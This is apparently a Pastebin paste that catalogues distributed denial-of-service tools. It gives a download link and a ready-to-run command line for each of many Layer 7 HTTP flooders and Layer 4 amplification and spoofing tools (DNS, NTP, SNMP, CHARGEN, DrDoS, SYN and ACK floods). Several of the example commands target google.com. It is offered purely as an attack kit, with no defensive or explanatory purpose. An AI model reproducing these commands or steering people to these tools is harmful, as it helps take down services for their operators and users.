Advertisement
Guest User

Untitled

a guest
Feb 13th, 2016
346
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.33 KB | None | 0 0
  1. ##### LÜDDE #####
  2. Layer 7
  3.  
  4. ARME (For Apache Servers)
  5. http://www.mediafire.com/view/5evl45bx12jvod8/arme.c
  6. ./arme http://google.com 5000 proxies.txt 3600 0
  7.  
  8. GHP (Get / Head / Post )
  9. http://www.mediafire.com/view/h1k0rnot5x55x1m/ghp.c
  10. ./ghp http://google.com GET 5000 proxies.txt 3600 0 %random%
  11.  
  12. Hulk (Python)
  13. http://www.mediafire.com/view/zzayd073xt6xj5f/hulk.py
  14. python hulk.py http://google.com
  15.  
  16. Rand (Perl)
  17. http://www.mediafire.com/view/5f0188o19kkz5d8/Rand.pl
  18. perl rand.pl http://google.com 3600
  19.  
  20. R.U.D.Y
  21. http://www.mediafire.com/view/mf9qhehd95dru69/rudy.c
  22. ./rudy http://google.com 1 5000 proxies.txt 3600 0 %random%
  23.  
  24. SlowLoris
  25. http://www.mediafire.com/view/6an1elr7wz32gqx/slow.c
  26. ./slow http://google.com 5000 proxies.txt 3600 0
  27.  
  28. XML-RPC Pingback ( C version )
  29. http://www.mediafire.com/download/ppo0kpcf699qv1l/xml
  30. ./xml http://google.com xml.txt 10000 3600
  31.  
  32. XML-RPC Pingback ( Perl Version )
  33. http://pastebin.com/LXzyrYrB
  34. perl xml.pl http://google.com/ 10000 xmlrpc.txt 3600
  35.  
  36. XML-RPC Pingback ( PHP Version )
  37. http://pastebin.com/UPu1hd3g
  38. php xml.php xml.txt 10000
  39.  
  40. 007 Goldeneye
  41. http://pastebin.com/FtBTrB15
  42. python 007.py http://google.com
  43.  
  44. Pyloris
  45. http://sourceforge.net/projects/pyloris/
  46. python pyloris.py http://google.com 80 0 3600 200 60000 2
  47.  
  48. Layer 4
  49.  
  50. Fragmentation Script !
  51. https://www.mediafire.com/?34adxv2nhtp8313
  52. ./fragmentation 192.154.22.10
  53.  
  54. DNS AMP (UDP)
  55. http://pastebin.com/D2RSDd9X
  56. ./amp 127.0.0.1 80 amp.txt 2 3600
  57.  
  58. CHARGEN
  59. http://pastebin.com/iteE3FsC
  60. ./chargen 127.0.0.1 80 chargen.txt 2 -1 3600
  61.  
  62. TCP (Advanced ESSYN)
  63. http://pastebin.com/b0KAM2up
  64. ./tcp 127.0.0.1 80 2 -1 3600
  65.  
  66. SNMP (C Version)
  67. http://pastebin.com/0paGRUiU
  68.  
  69. SNMP (Python Version)
  70. http://pastebin.com/0C3gBJ8S
  71. ./snmp -t 127.0.0.1 -f snmp.txt -l 30
  72.  
  73. Spoofed UDP
  74. http://pastebin.com/8HS7baKd
  75. ./sudp 127.0.0.1 80 5 5 3600
  76.  
  77. NTP (Python)
  78. http://pastebin.com/Rgq3mWem
  79. python ntp.py 127.0.0.1 ntp.txt 5
  80.  
  81. NTP (Perl)
  82. http://pastebin.com/9kGK4HeB
  83. perl ntp.pl 127.0.0.1 80 3600 ntp.txt 5
  84.  
  85. DrDos
  86. http://pastebin.com/xxm6QbmH
  87. perl drdos.pl 127.0.0.1 80 servers.txt 5 tcp 10 3600
  88.  
  89. Haven
  90. http://www.mediafire.com/download/2r5dm6d6ewb9w2w/haven
  91. ./haven -d 127.0.0.1 -s 255.255.255.255 -t 3600 -z 30
  92.  
  93. ACK
  94. http://www.mediafire.com/download/7ojx7bawpnw25ch/ack
  95. ./ack 127.0.0.1 3600
  96.  
  97. #### LÜDDE ####
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement